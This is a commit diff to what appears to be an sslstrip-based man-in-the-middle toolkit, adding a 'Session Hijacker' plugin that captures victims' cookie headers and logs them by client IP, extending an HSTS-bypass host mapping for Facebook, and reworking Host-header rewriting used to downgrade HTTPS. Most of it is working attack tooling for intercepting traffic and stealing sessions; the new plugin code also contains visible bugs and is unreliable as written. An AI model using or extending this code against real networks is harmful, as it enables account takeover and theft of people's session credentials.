added PoC session hijacking plugin

config_files/hsts_bypass.cfg

@@ -8,3 +8,4 @@ accounts.google.se = cuentas.google.se
 
 #for facebook
 www.facebook.com = social.facebook.com
+facebook.com = social.facebook.com

plugins/SessionHijacker.py

@@ -0,0 +1,30 @@
+from plugins.plugin import Plugin
+import os
+import argparse
+import logging
+
+class SessionHijacker(Plugin):
+	name = "Session Hijacker"
+	optname = "hijack"
+	desc = "Performs session hijacking attacks against clients"
+	implements = ["sendHeaders"]
+	has_opts = False
+
+	def initialize(self, options):
+		'''Called if plugin is enabled, passed the options namespace'''
+		self.options = options
+		self.log_clients = options.clients
+
+	def sendHeaders(self, request):
+		for header, value in request.headers.items():
+			if header == 'cookie':
+				if self.log_clients:
+					log_file = open('./logs/%s.log', 'a' % request.client.getClientIP())
+					log_file.write(request.header['host'], value, "\n")
+					log_file.close()
+
+					logging.info("%s %s << Wrote cookie to logfile" % (request.client.getClientIP(), request.headers['host']))
+				else:
+					logging.info("%s %s << Got cookie: %s" % (request.client.getClientIP(), request.headers['host'], value))
+
+	#def add_options(options):

sslstrip/ClientRequest.py

@@ -94,7 +94,10 @@ class ClientRequest(Request):
         client            = self.getClientIP()
         path              = self.getPathFromUri()
 
-        self.content.seek(0,0)
+        try:
+            self.content.seek(0,0)
+        except:
+            pass
         postData          = self.content.read()
         url               = 'http://' + host + path
 

sslstrip/ClientRequestHSTS.py

@@ -76,11 +76,22 @@ class ClientRequest(Request):
         	del headers['if-none-match']
         	
         if 'host' in headers:
-        	host = self.urlMonitor.URLgetRealHost("%s" % headers['host'])
+            real_host = self.urlMonitor.URLgetRealHost("%s" % headers['host'])
-        	logging.debug("Modifing HOST header: %s -> %s" % (headers['host'],host))
+        	#logging.info("Modifing HOST header: %s -> %s" % (headers['host'],host))
-        	headers['host'] = host
+            if 'www.' in real_host:
-        	headers['securelink'] = '1'
+                fake_host = 'w' + real_host
-        	self.setHeader('Host',host)
+                headers['host'] = fake_host
+                fake_host = self.urlMonitor.URLgetRealHost("%s" % headers['host'])
+                headers['securelink'] = '1'
+                self.setHeader('Host', fake_host)
+                logging.info("Modifing HOST header: %s -> %s" % (real_host,fake_host))
+            else:
+                fake_host = 'web' + real_host
+                headers['host'] = fake_host
+                fake_host = self.urlMonitor.URLgetRealHost("%s" % headers['host'])
+                headers['securelink'] = '1'
+                self.setHeader('Host', fake_host)
+                logging.info("Modifing HOST header: %s -> %s" % (real_host,fake_host))
 
         return headers
 
@@ -112,7 +123,12 @@ class ClientRequest(Request):
         host = self.urlMonitor.URLgetRealHost("%s" % lhost)
         client = self.getClientIP()
         path = self.getPathFromUri()
-        self.content.seek(0, 0)
+
+        try:
+            self.content.seek(0, 0)
+        except:
+            pass
+
         postData = self.content.read()
         real = self.urlMonitor.real
         patchDict = self.urlMonitor.patchDict

sslstrip/ServerConnection.py

@@ -54,7 +54,7 @@ class ServerConnection(HTTPClient):
 
     def sendRequest(self):
         if self.command == 'GET':
-            logging.info("%s Sending Request: %s %s"  % (self.client.getClientIP(), self.command, self.headers['host']))
+            logging.info("%s Sending Request: %s %s %s"  % (self.client.getClientIP(), self.command, self.headers['host'], self.headers['user-agent']))
         self.plugins.hook()
         self.sendCommand(self.command, self.uri)
 
@@ -100,8 +100,8 @@ class ServerConnection(HTTPClient):
             if (value.find('gzip') != -1):
                 logging.debug("Response is compressed...")
                 self.isCompressed = True
-        if (key.lower() == 'strict-transport-security'):
+        #if (key.lower() == 'strict-transport-security'):
-            value = 'max-age=0'
+        #    value = 'max-age=0'
 
         elif (key.lower() == 'content-length'):
             self.contentLength = value

sslstrip/ServerConnectionFactory.py

@@ -40,5 +40,7 @@ class ServerConnectionFactory(ClientFactory):
             logging.debug("Retrying via SSL")
             self.client.proxyViaSSL(self.headers['host'], self.command, self.uri, self.postData, self.headers, 443)
         else:
-            self.client.finish()
+            try:
-
+                self.client.finish()
+            except:
+                pass

sslstrip/URLMonitorHSTS.py

@@ -64,14 +64,14 @@ class URLMonitor:
 
 		#LEO: Sustituir HOST
         if not self.sustitucion.has_key(host):
-        	lhost = host[:4]
+            lhost = host[:4]
-        	if lhost=="www.":
+            if lhost=="www.":
         		self.sustitucion[host] = "w"+host
         		self.real["w"+host] = host
-        	else:
+            else:
         		self.sustitucion[host] = "web"+host
         		self.real["web"+host] = host
-        	#logging.info("LEO: ssl host      (%s) tokenized (%s)" % (host,self.sustitucion[host]) )
+            logging.info("LEO: ssl host      (%s) tokenized (%s)" % (host,self.sustitucion[host]) )
         		
         url = 'http://' + host + path
         #logging.debug("LEO stripped URL: %s %s"%(client, url))